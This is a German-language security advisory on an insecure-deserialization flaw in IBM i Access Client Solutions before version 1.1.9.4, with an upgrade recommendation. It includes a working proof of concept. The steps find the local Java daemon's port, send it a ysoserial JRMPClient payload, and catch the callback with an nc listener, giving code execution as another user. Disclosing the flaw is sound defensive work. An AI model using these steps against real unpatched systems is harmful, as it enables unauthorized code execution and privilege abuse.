
IBM i Access Client Solutions < 1.1.9.4 - Remotecodeausführung durch unsichere Deserialisierung
IBM i Access Client Solutions < 1.1.9.4 - Remote-Code-Ausführung durch unsichere Deserialisierung.
IBM i Access Client Solutions verwendet unsichere Deserialisierung für die Passwortspeicherung und zum Abrufen des Entschlüsselungsschlüssels für die Passwortverschlüsselung. Dies könnte von einem lokalen oder entfernten Angreifer zur Codeausführung genutzt werden.
Der lokale Server lässt sich leicht mit dem Befehl `netstat' finden:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ netstat -nltp | grep java
tcp6 0 0 :::34307 :::* LISTEN 3225094/java off (0.00/0/0)
Wir können Details zu diesem lokalen Server mit dem Befehl ps bestätigen:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ ps aux | grep java
mmajchr+ 3224938 6.8 0.9 13305316 301392 pts/6 Sl+ 12:30 0:17 java -jar ./acsbundle_1.9.new.jar
mmajchr+ 3225094 0.3 0.2 11512420 79692 pts/6 Sl+ 12:30 0:00 /usr/lib/jvm/java-17-openjdk-amd64/bin/java -Djava.class.path=/tmp/ACS.lm13910263510749358977.jar -Dvisualvm.display.name=ACS Daemon -Dcom.ibm.tools.attach.displayName=ACS Daemon com.ibm.iaccess.base.LmHybridServerImpl
mkubiak 3238934 0.0 0.0 6464 1992 pts/12 R+ 12:44 0:00 grep --color=auto java
Wir können eine Codeausführung durch den Benutzer mmajchrowicz unter Verwendung des ysoserial-Payloads aus dem Konto mkubiak erreichen:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ id
uid=1012(mkubiak) gid=1012(mkubiak) groups=1012(mkubiak),27(sudo)
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java -jar ysoserial.jar JRMPClient '127.0.0.1:9191' > jrmp.bin
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ (sleep 3; cat jrmp.bin) | nat -6 ::1 34307
Im zweiten Terminal erhalten wir nach der Ausführung des Payloads durch den Dienst eine Verbindung:
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ nc -lvnp 9191
listening on [any] 9191 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 38012
JRMIK
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$
Dieses Problem wurde durch eine unsichere Deserialisierung von Netzwerkpaketen und Benutzerdaten verursacht. Dieses Problem wurde in IBM i Access Client Solutions 1.1.9.4 behoben.
< 1.1.9.4
Aktualisieren Sie IBM i Access Client Solutions auf Version 1.1.9.4 oder neuer.